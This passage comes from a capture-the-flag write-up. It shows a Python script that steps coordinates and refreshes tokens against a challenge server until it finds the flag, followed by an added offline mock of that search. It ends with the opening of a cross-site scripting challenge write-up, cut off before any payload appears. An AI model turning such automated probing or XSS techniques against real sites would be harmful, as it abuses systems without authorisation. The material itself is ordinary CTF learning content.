At `{'lat': '51.4921', 'lon': '-0.1929', 'token': 'gAAAAABdEwWoQWGTXd5P1nB6paz9PWM-LbxNr_bfmaAC5qVJZXwanyHyGPUHqFZIj9hj3I3Q1mqG3jpWEIgLO3z7C_tu7MsEDb33TL3FFyUtM0gxFmFMc-Xs6K8h57Wu-yl5IB-ZNJgY'}`, the script got stuck in a loop printing out `If you want to meet your friends, you should move.` because I forgot the exit condition. So at that point I just manually adjusted the values. The final values are
`{'lat': '51.4921', 'lon': '-0.1929'}` with the flag `CTF{Who_is_Tardis_Ormandy}`. In all, it took quite a long time to run.
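
An offline sketch of the search described above, added here and not part of the original repository: it walks `lon` and then `lat`, retries throttled moves, and includes the flag check and exit condition the write-up says were missing. `MockSite`, `send`, `drive`, the throttle rate, the exact reply wording after the known prefixes and the placeholder flag are all constructed assumptions; coordinates are integers in units of 0.0001 degrees so that no float drift occurs.

```python
import math

THROTTLED = ("You tried to travel", "Woa, were about to move")  # prefixes drive.py retries on


class MockSite:
    """Constructed offline stand-in for the challenge site; coordinates are ints in 1e-4 degrees."""

    def __init__(self, start, target, throttle_every=4):
        self.pos, self.target = start, target
        self.calls, self.throttle_every = 0, throttle_every

    def _dist(self, p):
        return math.hypot(p[0] - self.target[0], p[1] - self.target[1])

    def move(self, lat, lon):
        self.calls += 1
        if self.calls % self.throttle_every == 0:
            return "You tried to travel (constructed throttle reply)"
        if (lat, lon) == self.pos:
            return "If you want to meet your friends, you should move."
        closer = self._dist((lat, lon)) < self._dist(self.pos)
        self.pos = (lat, lon)
        if self.pos == self.target:
            return "CTF{constructed_placeholder}"
        return "You are getting closer…" if closer else "You are getting away…"


def send(site, point, max_retries=5):
    """Submit one move, repeating the same values while the site reports throttling."""
    for _ in range(max_retries + 1):
        reply = site.move(*point)
        if not reply.startswith(THROTTLED):
            return reply
    raise RuntimeError("still throttled after {} retries".format(max_retries))


def drive(site, lat, lon, step=-1):
    """Walk lon first, then lat (the write-up's order); return (position, flag or None)."""
    for axis in ("lon", "lat"):
        while True:
            nxt = (lat, lon + step) if axis == "lon" else (lat + step, lon)
            reply = send(site, nxt)
            if "CTF" in reply:                      # the flag check the write-up lacked
                return nxt, reply
            if reply.endswith("You are getting closer…"):
                lat, lon = nxt
            elif reply.endswith("You are getting away…"):
                send(site, (lat, lon))              # undo the overshoot, then switch axis
                break
            else:                                   # e.g. "you should move": stop, do not spin
                return (lat, lon), None
    return (lat, lon), None


if __name__ == "__main__":
    # Start and target are the values from drive.py and the write-up, scaled by 10^4.
    site = MockSite(start=(515710, -1925), target=(514921, -1929))
    print(drive(site, 515710, -1925), "requests:", site.calls)
```

The request counter on the mock makes the cost of one-step-at-a-time probing visible, which matches the write-up's remark that the run took a long time.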
--------------------------------------------------------------------------------
/08-misc-drive-to-target/drive.py:
--------------------------------------------------------------------------------
# requires requests and requests-html

from requests_html import HTMLSession
from urllib.parse import urlparse, parse_qs
import time

lat = 51.5710
lon = -0.1925
token = 'gAAAAABdEwKRoX1YphdiX0kwxKSsY6CmxjNt-R5hkwf4-Ohktb7oyZJRkrX-LK5j12wuj_jgSNjY9wG53zrifwIe1OMk23uTX7LJaYzB7gWRPFUBXYqePYLekg4Z2RgMt3HE0ehzP50Y'
url = 'https://drivetothetarget.web.ctfcompetition.com'
inc = 0.0001
is_lat = False

session = HTMLSession()
while True:
    # step only the axis currently being walked
    qlat = lat - inc if is_lat else lat
    qlon = lon - inc if not is_lat else lon
    query = {'lat': "{0:.4f}".format(qlat), 'lon': "{0:.4f}".format(qlon), 'token': token}
    r = session.get(url, params=query)
    response_url = urlparse(r.url)
    response_query = parse_qs(response_url.query)

    # every response carries a fresh token in a hidden input field
    token = r.html.find('input')[2].attrs['value']

    print(query)

    try:
        response_text = r.html.find('p')[1].text
        print(response_text)

        if response_text.startswith('You tried to travel') or response_text.startswith('Woa, were about to move'):
            # retry last values
            pass
        elif response_text.endswith('You are getting closer…'):
            # update with new values
            lat = float(response_query['lat'][0])
            lon = float(response_query['lon'][0])
        elif response_text.endswith('You are getting away…'):
            if is_lat:
                print("done, {}".format(query))
                exit()
            is_lat = True
    except Exception:
        # a bare "except:" here would also swallow the SystemExit raised by exit()
        print('Error. {}'.format(r.html.text))
        print("url: {}".format(r.url))

# states = [0, 1]
# state = 0
# failcount = 0

# last_lat = lat
# last_lon = lon

# session = HTMLSession()
# while True:
#     query = {'lat': str(lat), 'lon': str(lon), 'token': token}
#     print({'lat': lat, 'lon': lon})
#     r = session.get(url, params=query)
#     response_url = urlparse(r.url)
#     response_query = parse_qs(response_url.query)
#     token = response_query['token'][0]

#     try:
#         response_text = r.html.find('p')[1].text
#         print(response_text)
#         print(token)

#         if response_text.startswith('You tried to travel'):
#             failcount += 1
#             if failcount > 2:
#                 failcount = 0
#                 state = (state + 1) % len(states)

#             lat = last_lat
#             lon = last_lon
#         else:
#             failcount = 0
#             last_lat = lat
#             last_lon = lon

#         if states[state] == 0:
#             lon -= inc
#         else:
#             lat -= inc
#     except:
#         print('Error. {}'.format(r.html.text))
#         print("url: {}".format(r.url))

#     time.sleep(1)


# states = [2]
# state = 0
# inc = 0.0005

# last_lat = lat
# last_lon = lon
# failcount = 0

# while True:
#     query = {'lat': str(lat), 'lon': str(lon), 'token': token}
#     print({'lat': lat, 'lon': lon})
#     r = session.get(url, params=query)
#     response_url = urlparse(r.url)
#     response_query = parse_qs(response_url.query)
#     token = response_query['token'][0]

#     try:
#         response_text = r.html.find('p')[1].text
#         print(response_text)
#         print(token)

#         if response_text.startswith('You tried to travel'):
#             failcount += 1
#             if (failcount > 2):
#                 failcount = 0
#                 # inc /= 10

#             state = (state + 1) % len(states)
#             lat = last_lat
#             lon = last_lon
#         else:
#             failcount = 0
#             inc = 0.001
#             last_lat = lat
#             last_lon = lon

#         if states[state] == 1:
#             lat -= inc
#         elif states[state] == 2:
#             lon -= inc
#         elif states[state] == 0:
#             lat -= inc
#             lon -= inc
#     except:
#         print('Error. {}'.format(r.html.text))
#         print("url: {}".format(r.url))

#     input()
--------------------------------------------------------------------------------
/09-web-cwo-xss/README.md:
--------------------------------------------------------------------------------
# Description
## Cookie World Order
Label: web

Good job! You found a further credential that looks like a VPN referred to as the cWo. The organization appears very clandestine and mysterious and reminds you of the secret ruling class of hard shelled turtle-like creatures of Xenon. Funny they trust their security to a contractor outside their systems, especially one with such bad habits.
Upon further snooping you find a video feed of those "Cauliflowers" which look to be the dominant lifeforms and members of the cWo. Go forth and attain greater access to reach this creature!

# Solution
This task gives us a link [https://cwo-xss.web.ctfcompetition.com/](https://cwo-xss.web.ctfcompetition.com/). The website contains a video and a chat window on the right side. It appears that we are chatting with an admin and so it probably requires another xss. However, entering a tag like `